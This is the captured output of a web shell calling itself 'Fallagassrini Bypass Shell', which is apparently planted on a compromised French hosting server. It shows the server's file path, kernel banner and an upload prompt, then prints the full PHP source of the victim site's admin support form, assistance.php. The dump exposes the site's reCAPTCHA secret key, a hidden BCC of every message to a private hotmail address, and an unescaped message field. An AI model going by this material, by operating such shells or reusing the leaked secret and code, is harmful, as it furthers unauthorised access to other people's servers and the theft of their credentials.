Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/h/a/p/happyrenas/old/happy-r.fr/transfere_pro/administration/templates/admin2/

Linux webd005.cluster105.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Upload File :
Current File : /home/h/a/p/happyrenas/old/happy-r.fr/transfere_pro/administration/templates/admin2/assistance.php

<?
session_start();
include("config.php");
$page="assistance";
?>
<!DOCTYPE html>
<!--[if IE 8]> <html lang="en" class="ie8 no-js"> <![endif]-->
<!--[if IE 9]> <html lang="en" class="ie9 no-js"> <![endif]-->
<!--[if !IE]><!-->
<html lang="fr" class="no-js">
<!--<![endif]-->
<!-- BEGIN HEAD -->
<head>
<meta charset="utf-8"/>
<title>HAPPY RENTALS ADMINISTRATION</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta content="width=device-width, initial-scale=1.0" name="viewport"/>
<meta http-equiv="Content-type" content="text/html; charset=utf-8">
<meta content="" name="description"/>
<meta content="" name="author"/>
<!-- BEGIN GLOBAL MANDATORY STYLES -->
<link href="https://fonts.googleapis.com/css?family=Open+Sans:400,300,600,700&subset=all" rel="stylesheet" type="text/css">
<link href="../../assets/global/plugins/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
<link href="../../assets/global/plugins/simple-line-icons/simple-line-icons.min.css" rel="stylesheet" type="text/css">
<link href="../../assets/global/plugins/bootstrap/css/bootstrap.min.css" rel="stylesheet" type="text/css">
<link href="../../assets/global/plugins/uniform/css/uniform.default.css" rel="stylesheet" type="text/css">
<link href="../../assets/global/plugins/bootstrap-switch/css/bootstrap-switch.min.css" rel="stylesheet" type="text/css"/>
<!-- END GLOBAL MANDATORY STYLES -->
<!-- BEGIN PAGE LEVEL STYLES -->
<link rel="stylesheet" type="text/css" href="../../assets/global/plugins/bootstrap-fileinput/bootstrap-fileinput.css"/>
<link rel="stylesheet" type="text/css" href="../../assets/global/plugins/bootstrap-switch/css/bootstrap-switch.min.css"/>
<link rel="stylesheet" type="text/css" href="../../assets/global/plugins/jquery-tags-input/jquery.tagsinput.css"/>
<link rel="stylesheet" type="text/css" href="../../assets/global/plugins/bootstrap-markdown/css/bootstrap-markdown.min.css">
<link rel="stylesheet" type="text/css" href="../../assets/global/plugins/typeahead/typeahead.css">
<!-- END PAGE LEVEL STYLES -->
<!-- BEGIN THEME STYLES -->
<link href="../../assets/global/css/components.css" rel="stylesheet" type="text/css"/>
<link href="../../assets/global/css/plugins.css" rel="stylesheet" type="text/css"/>
<link href="../../assets/admin/layout2/css/layout.css" rel="stylesheet" type="text/css"/>
<link id="style_color" href="../../assets/admin/layout2/css/themes/default.css" rel="stylesheet" type="text/css"/>
<link href="../../assets/admin/layout2/css/custom.css" rel="stylesheet" type="text/css"/>
<!-- END THEME STYLES -->
<link rel="shortcut icon" href="favicon.ico"/>
<script src='https://www.google.com/recaptcha/api.js'></script>
</head>
<!-- END HEAD -->
<!-- BEGIN BODY -->
<!-- DOC: Apply "page-header-fixed-mobile" and "page-footer-fixed-mobile" class to body element to force fixed header or footer in mobile devices -->
<!-- DOC: Apply "page-sidebar-closed" class to the body and "page-sidebar-menu-closed" class to the sidebar menu element to hide the sidebar by default -->
<!-- DOC: Apply "page-sidebar-hide" class to the body to make the sidebar completely hidden on toggle -->
<!-- DOC: Apply "page-sidebar-closed-hide-logo" class to the body element to make the logo hidden on sidebar toggle -->
<!-- DOC: Apply "page-sidebar-hide" class to body element to completely hide the sidebar on sidebar toggle -->
<!-- DOC: Apply "page-sidebar-fixed" class to have fixed sidebar -->
<!-- DOC: Apply "page-footer-fixed" class to the body element to have fixed footer -->
<!-- DOC: Apply "page-sidebar-reversed" class to put the sidebar on the right side -->
<!-- DOC: Apply "page-full-width" class to the body element to have full width page without the sidebar menu -->
<body class="page-boxed page-header-fixed page-sidebar-closed-hide-logo page-container-bg-solid page-sidebar-closed-hide-logo">
<!-- BEGIN HEADER -->
<?include("header_top.php");?>
<!-- END HEADER -->
<div class="clearfix">
</div>
<!-- BEGIN CONTAINER -->
<div class="container">
	<div class="page-container">
		<!-- BEGIN SIDEBAR -->
		<div class="page-sidebar-wrapper">
			<!-- DOC: Set data-auto-scroll="false" to disable the sidebar from auto scrolling/focusing -->
			<!-- DOC: Change data-auto-speed="200" to adjust the sub menu slide up/down speed -->
			<div class="page-sidebar navbar-collapse collapse">
				<?include("header_left.php");?>
			</div>
		</div>
		<!-- END SIDEBAR -->
		<!-- BEGIN CONTENT -->
		<div class="page-content-wrapper">
			<div class="page-content">
				<!-- BEGIN SAMPLE PORTLET CONFIGURATION MODAL FORM-->
				<div class="modal fade" id="portlet-config" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
					<!-- /.modal-dialog -->
				</div>
				<!-- /.modal -->
				<!-- END SAMPLE PORTLET CONFIGURATION MODAL FORM-->
				<!-- BEGIN PAGE HEADER-->
				<h3 class="page-title">
				Assistance <small>Formulaire d'assistance</small>
				</h3>
				<div class="page-bar">
					<ul class="page-breadcrumb">
						<li>
							<i class="fa fa-home"></i>
							<a href="index.php">Accueil</a>
							<i class="fa fa-angle-right"></i>
						</li>
						<li>
							<a href="#">Assistance</a>
						</li>
					</ul>
				</div>
				
				<!-- END PAGE HEADER-->
				<!-- BEGIN PAGE CONTENT-->							
				<!--PHILIPPE-->				
				<?
				$id_proprietaire		= $_SESSION['proprietaire_id'];
				// INSERTION
				if ($_POST['nom_prenom']!='' && $_POST['email']!='')
				{
					
					
				$secret = "6LdDvT0UAAAAAHN0Gk0Rd33dKUDhU3vyL1C8N3ZH";
				$response = $_POST['g-recaptcha-response'];
				$remoteip = $_SERVER['REMOTE_ADDR'];
				$api_url = "https://www.google.com/recaptcha/api/siteverify?secret=" 
					. $secret
					. "&response=" . $response
					. "&remoteip=" . $remoteip ;
					
				$decode = json_decode(file_get_contents($api_url), true);
				//echo "<pre>";print_r($decode);
				if ($decode['success'] == true) {
				}
				else {
					//echo "<a href='javascript:history.go(-1);'>Merci de cliquer sur la case [Je ne suis pas un robot] dans le formulaire précédent</a>";
					echo "<a href='assistance.php'>Merci de cliquer sur la case [Je ne suis pas un robot] dans le formulaire précédent</a>";
					exit;
				}
				
				
				$nom_prenom 					= $db->escape($_POST['nom_prenom']);				
				$entreprise 					= $db->escape($_POST['entreprise']);				
				$email 							= $db->escape($_POST['email']);				
				$telephone 						= $db->escape($_POST['telephone']);				
				$message 						= $_POST['message'];				
				
				
				
					
				$type_message="success";
				$titre_message="Message envoyé";
				$texte_message="Votre demande a été envoyé à l'équipe Happy Rentals" ;
				echo 	"
						<div class='portlet-body'>
						<div class='note note-$type_message'>
						<h4 class='block'>$titre_message</h4>
						<p>$texte_message</p>
						</div>
						</div>
						";
				
				
				require_once('includes/class.phpmailer.php');
				require_once('includes/class.smtp.php');
				include('mailing_template_assistance.php');
								
								
								//$ENVOI MAIL DEVIS";
								
								
								$from="assistance@happy-r.fr";
								$to="assistance@happy-r.fr";
								$reply="assistance@happy-r.fr";
								$mail = new PHPmailer();
								$mail->IsHTML(true);
								$mail->From=$from;
								$mail->AddAddress($to);
								$mail->AddBCC("phil_aph@hotmail.com");
								
								
								$objet="Assistance Happy Rentals";
								$mail->Subject=$objet;
						

								
								$mail->Body=$message;
								if(!$mail->Send())
								{//echo $mail->ErrorInfo;
								}
								else{echo '';}
								unset($mail);
								
								
								
				}
	
				
				
				
				?>
				
				<div class="row">
								<div class="col-md-12">


                                <div class="panel panel-success">
									<div class="panel-heading">
										<h2 class="panel-title"><b>Besoin d’assistance ?</b></h2>
									</div>
									<div class="panel-body">
									   		 L’équipe Happy-R est à votre  écoute.Nous vous répondrons par mail ou téléphone dans les  meilleurs délais.
									   </div>
								</div>


									<div class="portlet box blue-hoki">
										<div class="portlet-title">
											<div class="caption">
												<i class="fa fa-cogs"></i>Assistance
											</div>
											<div class="tools">
												<a href="javascript:;"  onclick='location.reload(true); return false;' class="reload">
												</a>
											</div>
										</div>
										<div class="portlet-body form">
											
											<form method="post" action="assistance.php" class="form-horizontal form-row-seperated">
											
											
												<div class="form-body">
													<div class="form-group">
														<label class="control-label col-md-3">Nom et prénom <span class="required">*</span></label>
														<div class="col-md-3">
															<input value="" type="text" name="nom_prenom" placeholder="Nom et prénom" maxlength="100" required class="form-control"/>
														</div>
													</div>
													
													<div class="form-group">
														<label class="control-label col-md-3">Nom de votre hébergement <span class="required">*</span></label>
														<div class="col-md-3">
															<input value="" type="text" name="entreprise" placeholder="Nom de votre hébergement" maxlength="100" required class="form-control"/>
														</div>
													</div>
													
												
													<div class="form-group">
														<label class="control-label col-md-3">Votre Email <span class="required">*</span></label>
														<div class="col-md-9">
															<input value="" type="email" name="email" placeholder="Email" maxlength="100" required class="form-control"/>
														</div>
													</div>
													
													<div class="form-group">
														<label class="control-label col-md-3">Téléphone <span class="required">*</span></label>
														<div class="col-md-3">
															<input value="" type="text" name="telephone" placeholder="Téléphone" maxlength="100" required class="form-control"/>
														</div>
													</div>
													
													
													
													
													
													<div class="form-group">
														<label class="control-label col-md-3">Votre message <span class="required">*</span></label>
														<div class="col-md-9">
															<textarea  placeholder="Votre message" rows=10 name="message" id="message" class="form-control" required class="form-control"/></textarea>
														</div>
													</div>
													
													<div class="form-group">
														<label class="control-label col-md-3"></label>
														<div class="col-md-9">
															<div class="g-recaptcha" data-sitekey="6LdDvT0UAAAAADqTZWwsbbkSrL33i4KiYu37-xMu"></div>								
														</div>
													</div>															
													
													
													<div class="form-group">
														<label class="control-label col-md-3"></label>
														<div class="col-md-9">
															<button type="submit" class="btn green"><i class="fa fa-pencil"></i>  Envoyer</button>
														</div>
													</div>															
													
													
													
													
													
												</div>
											</form>
											<!-- END FORM-->
										</div>
						</div>
						<!-- END EXTRAS PORTLET-->
					</div>
				</div>

<script type='text/javascript' src='//code.jquery.com/jquery-1.9.1.js'></script>
			
				<!-- END PAGE CONTENT-->
			</div>
		</div>
		<!-- END CONTENT -->
		<!-- BEGIN QUICK SIDEBAR -->
		<!--Cooming Soon...-->
		<!-- END QUICK SIDEBAR -->
	</div>
	<!-- END CONTAINER -->
	<!-- BEGIN FOOTER -->
	<div class="page-footer">
		<div class="page-footer-inner">
			 2014 &copy; P.J
		</div>
		<div class="scroll-to-top">
			<i class="icon-arrow-up"></i>
		</div>
	</div>
	<!-- END FOOTER -->
</div>
<!-- BEGIN JAVASCRIPTS(Load javascripts at bottom, this will reduce page load time) -->
<!-- BEGIN CORE PLUGINS -->
<!--[if lt IE 9]>
<script src="../../assets/global/plugins/respond.min.js"></script>
<script src="../../assets/global/plugins/excanvas.min.js"></script> 
<![endif]-->
<script src="../../assets/global/plugins/jquery.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/jquery-migrate.min.js" type="text/javascript"></script>
<!-- IMPORTANT! Load jquery-ui-1.10.3.custom.min.js before bootstrap.min.js to fix bootstrap tooltip conflict with jquery ui tooltip -->
<script src="../../assets/global/plugins/jquery-ui/jquery-ui-1.10.3.custom.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/bootstrap/js/bootstrap.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/bootstrap-hover-dropdown/bootstrap-hover-dropdown.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/jquery-slimscroll/jquery.slimscroll.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/jquery.blockui.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/jquery.cokie.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/uniform/jquery.uniform.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/bootstrap-switch/js/bootstrap-switch.min.js" type="text/javascript"></script>
<!-- END CORE PLUGINS -->
<!-- BEGIN PAGE LEVEL PLUGINS -->
<script type="text/javascript" src="../../assets/global/plugins/fuelux/js/spinner.min.js"></script>
<script type="text/javascript" src="../../assets/global/plugins/bootstrap-fileinput/bootstrap-fileinput.js"></script>
<script type="text/javascript" src="../../assets/global/plugins/jquery-inputmask/jquery.inputmask.bundle.min.js"></script>
<script type="text/javascript" src="../../assets/global/plugins/jquery.input-ip-address-control-1.0.min.js"></script>
<script src="../../assets/global/plugins/bootstrap-pwstrength/pwstrength-bootstrap.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/bootstrap-switch/js/bootstrap-switch.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/jquery-tags-input/jquery.tagsinput.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/bootstrap-maxlength/bootstrap-maxlength.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/bootstrap-touchspin/bootstrap.touchspin.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/typeahead/handlebars.min.js" type="text/javascript"></script>
<script src="../../assets/global/plugins/typeahead/typeahead.bundle.min.js" type="text/javascript"></script>
<script type="text/javascript" src="../../assets/global/plugins/ckeditor/ckeditor.js"></script>
<!-- END PAGE LEVEL PLUGINS -->
<!-- BEGIN PAGE LEVEL SCRIPTS -->
<script src="../../assets/global/scripts/metronic.js" type="text/javascript"></script>
<script src="../../assets/admin/layout2/scripts/layout.js" type="text/javascript"></script>
<script src="../../assets/admin/layout2/scripts/demo.js" type="text/javascript"></script>
<script src="../../assets/admin/pages/scripts/components-form-tools.js"></script>
<!-- END PAGE LEVEL SCRIPTS -->
<script>
        jQuery(document).ready(function() {       
           // initiate layout and plugins
           Metronic.init(); // init metronic core components
Layout.init(); // init current layout
Demo.init(); // init demo features
           ComponentsFormTools.init();
        });   
    </script>
<!-- BEGIN GOOGLE RECAPTCHA -->
<script type="text/javascript">
        var RecaptchaOptions = {
           theme : 'custom',
           custom_theme_widget: 'recaptcha_widget'
        };
    </script>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6LcrK9cSAAAAALEcjG9gTRPbeA0yAVsKd8sBpFpR"></script>
<!-- END GOOGLE RECAPTCHA -->
<!-- END JAVASCRIPTS -->
</body>
<!-- END BODY -->
</html>					

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net